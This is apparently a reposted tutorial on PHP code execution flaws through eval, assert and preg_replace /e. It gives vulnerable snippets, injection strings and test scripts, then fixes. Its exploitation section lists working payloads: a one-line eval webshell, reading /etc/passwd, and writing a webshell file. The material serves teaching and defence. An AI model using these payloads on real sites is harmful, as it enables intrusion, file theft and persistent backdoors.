Code Execution Vulnerability

Causes of code execution vulnerabilities:

When an application calls a function that turns a string into executable code (such as eval in PHP) without considering whether the user controls that string, a code execution vulnerability results.

Code execution vulnerabilities are hard to find by black-box testing; most of them are identified by reviewing the source code.

Code execution related functions:

PHP: eval, assert (with a string argument, PHP < 8.0), preg_replace() with the /e modifier (deprecated in PHP 5.5.0, removed in PHP 7.0)

JavaScript: eval

VBScript: Execute, Eval

Python: exec (and eval)

Java: there is no direct equivalent of PHP's eval that turns a string into executable code, but reflection, and the expression engines built on top of it such as OGNL, SpEL and MVEL, can lead to code execution vulnerabilities.

Code execution vulnerability cases:

1. The controllable point is the code to be executed itself.

    <?php
        $data = $_GET['data'];
        eval("\$ret = $data;");   // $data is spliced straight into the code that eval() runs
        echo $ret;
    ?>

Exploit: pass the PHP code to be executed directly as the value of data.

2. The controllable point is a function argument wrapped in single quotes.

    <?php
        $data = $_GET['data'];
        eval("\$ret = strtolower('$data');");   // $data lands inside '...' in the evaluated code
        echo $ret;
    ?>

Exploit: the single quote (and the function call around it) must be closed first.

Example: '); desired function; //

which turns the evaluated code into $ret = strtolower(''); desired function; //');

3. The controllable point is a function argument wrapped in double quotes.

    <?php
        $data = $_GET['data'];
        eval("\$ret = strtolower(\"$data\");");   // $data lands inside "..." in the evaluated code
        echo $ret;
    ?>

Example: {${desired function}}

(PHP interpolates the expression inside the double-quoted string, so the function runs without the quote having to be closed.)

Example: "); desired function; //

In PHP, a variable inside a double-quoted string is replaced by its value by the interpreter; inside single quotes it is not interpolated.

4. preg_replace() with the /e modifier (deprecated in PHP 5.5.0, removed in PHP 7.0)

    <?php
        $data = $_GET['data'];
        preg_replace('/<data>(.*)<\/data>/e', '$ret="\\1";', $data);   // /e evaluates the replacement as PHP code
        echo $ret;
    ?>

Example: <data>{${desired function}}</data>

With /e, the matched text is substituted for \1 and the result, $ret="{${desired function}}";, is evaluated as PHP code. Single quotes, double quotes and backslashes in the matched text are escaped with a backslash before substitution, which is why the payload uses the quote-free {${...}} form instead of closing the double quote.
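The four cases above in one runnable PHP 7/8 script, as an added example that is not part of the original post. It feeds the payloads of cases 1 to 4 into the matching sinks; marker() is a hypothetical stand-in for the function an attacker would inject (phpinfo() in practice) and counts how often injected code actually ran. Because PHP 7 removed the /e modifier, case 4 is emulated by hand, which also makes the quote escaping that /e applied to backreferences visible.

```php
<?php
// Added example, not code from the original post. marker() is a hypothetical
// stand-in for the function an attacker would inject (phpinfo() in practice):
// it counts how often injected code actually ran.
$hits = 0;
function marker(): string
{
    global $hits;
    $hits++;
    return 'ret'; // name of an existing variable, so ${marker()} resolves without a warning
}

// Case 1: the controllable value is the code itself.
function case1(string $data): string
{
    $ret = null;
    eval("\$ret = $data;");
    return (string) $ret;
}

// Case 2: the value sits inside single quotes in the evaluated code.
function case2(string $data): string
{
    $ret = null;
    eval("\$ret = strtolower('$data');");
    return (string) $ret;
}

// Case 3: the value sits inside double quotes in the evaluated code.
function case3(string $data): string
{
    $ret = null;
    eval("\$ret = strtolower(\"$data\");");
    return (string) $ret;
}

// Case 4: preg_replace() with /e, which PHP 7.0 removed, so it is emulated here:
// /e substituted the backreference into the replacement (with quotes and
// backslashes escaped, the same thing addslashes() does) and then eval'd it.
function case4(string $data): string
{
    $ret = null;
    if (preg_match('/<data>(.*)<\/data>/', $data, $m)) {
        eval('$ret="' . addslashes($m[1]) . '";');
    }
    return (string) $ret;
}

// Constructed payloads, one per technique from the cases above.
$cases = [
    'case 1, raw code'            => ['case1', 'marker()'],
    "case 2, close the '"         => ['case2', "'); marker(); //"],
    'case 3, close the "'         => ['case3', '"); marker(); //'],
    'case 3, {${}} interpolation' => ['case3', '{${marker()}}'],
    'case 4, /e with {${}}'       => ['case4', '<data>{${marker()}}</data>'],
    'case 4, /e with a quote'     => ['case4', '<data>"); marker(); //</data>'],
];

foreach ($cases as $label => [$sink, $payload]) {
    $before = $hits;
    $sink($payload);
    printf("%-30s %s\n", $label, $hits > $before ? 'injected code ran' : 'no execution');
}
```

Run it with the php command-line binary. The last row is the instructive one: the quote in that payload is escaped before the replacement is evaluated, so breaking out of the double quote does not work under /e and the quote-free {${...}} form from case 4 is needed.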

Exploiting a code execution vulnerability:

The payloads below use the ${...} form, so they fit the double-quote and preg_replace /e cases above. They deliberately contain no quote characters, which would either close the string or (under /e) be escaped; array keys are therefore written as bare words ($_POST[f]), which PHP 7 still treats as the string 'f' (with a warning) but PHP 8 rejects with an Error.

One-line webshell (the "one-sentence trojan"):

${@eval($_POST[1])}

Get the current working directory:

${exit(print(getcwd()))}

The exit() stops the rest of the page from running after the injected code. The one-line webshell above is then driven with a client such as China Chopper ("kitchen knife", 菜刀).

Read a file:

${exit(var_dump(file_get_contents($_POST[f])))}

with f=/etc/passwd submitted in the POST body.

Write a webshell:

${exit(var_dump(file_put_contents($_POST[f], $_POST[d])))}

with f=1.php&d=1111111 also submitted via POST.

Fixing code execution vulnerabilities:

    For eval(): make sure users cannot easily reach its argument at all, or strictly validate the format of the input with a regular expression before it is used. Better still, do not pass user-controlled data to eval() at all; call the function directly.

    For string arguments: wrap the controllable value in single quotes and run it through addslashes() before splicing it in, so the attacker cannot close the quote, and single-quoted strings do not interpolate {${...}}.

    For preg_replace(): stop using the e modifier (deprecated in PHP 5.5.0, removed in PHP 7.0) and use preg_replace_callback() instead. If the e modifier must be used, wrap the backreference for the matched text in single quotes in the second argument (the replacement), since /e escapes quotes in the matched text before substitution.
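The three fixes above, written out as an added example that is not part of the original post: hardened versions of the sinks from cases 1 to 4, checked against the same payloads that worked before. marker() is again a hypothetical stand-in for the attacker's function and counts its calls; the allow-list pattern is an assumption chosen for this example.

```php
<?php
// Added example, not code from the original post: hardened versions of the
// sinks from the cases above, checked against the same payloads. marker() is a
// hypothetical stand-in for the attacker's function and counts its calls.
$hits = 0;
function marker(): string
{
    global $hits;
    $hits++;
    return 'ret';
}

// Fix 1, the real fix: do not eval() user data at all; call the function directly.
function fixed_direct(string $data): string
{
    return strtolower($data);
}

// Fix 2, the page's advice for eval(): strict allow-list validation of the
// input format with a regular expression (assumed pattern) before eval().
function fixed_allowlist(string $data): string
{
    if (!preg_match('/^[a-z0-9_]{1,32}$/i', $data)) {
        return ''; // anything outside the allow-list is rejected outright
    }
    $ret = null;
    eval("\$ret = strtolower('$data');");
    return (string) $ret;
}

// Fix 3, the page's advice for string arguments: single quotes plus addslashes().
// Single-quoted strings do not interpolate {${...}}, and addslashes() escapes the
// quote the attacker needs to close the string.
function fixed_addslashes(string $data): string
{
    $ret = null;
    eval("\$ret = strtolower('" . addslashes($data) . "');");
    return (string) $ret;
}

// Fix 4, the page's advice for preg_replace() /e: use preg_replace_callback(),
// whose callback is a PHP closure, not a string that gets evaluated.
function fixed_callback(string $data): string
{
    return (string) preg_replace_callback(
        '/<data>(.*)<\/data>/',
        fn (array $m): string => strtolower($m[1]),
        $data
    );
}

// Constructed payloads: the ones that worked against the vulnerable cases.
$payloads = [
    'marker()',
    "'); marker(); //",
    '"); marker(); //',
    '{${marker()}}',
    '<data>{${marker()}}</data>',
];

foreach (['fixed_direct', 'fixed_allowlist', 'fixed_addslashes', 'fixed_callback'] as $fn) {
    $failed = 0;
    foreach ($payloads as $payload) {
        $before = $hits;
        $fn($payload);
        if ($hits > $before) {
            $failed++;
            printf("%-16s still executes %s\n", $fn, $payload);
        }
    }
    printf("%-16s %s\n", $fn, $failed === 0 ? 'blocked every payload' : "failed $failed payload(s)");
}
```

Fixes 2 and 3 keep eval() in the code and should be a last resort: addslashes() also escapes backslashes and double quotes, so the value that reaches strtolower() can differ from the input, and any gap in the allow-list pattern reopens the hole. Fix 1, or preg_replace_callback() for the regex case, removes the string-to-code step entirely.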

Reproduced from: https://www.jianshu.com/p/2e7363f3d3ea


Origin: https://blog.csdn.net/weixin_33755847/article/details/91288940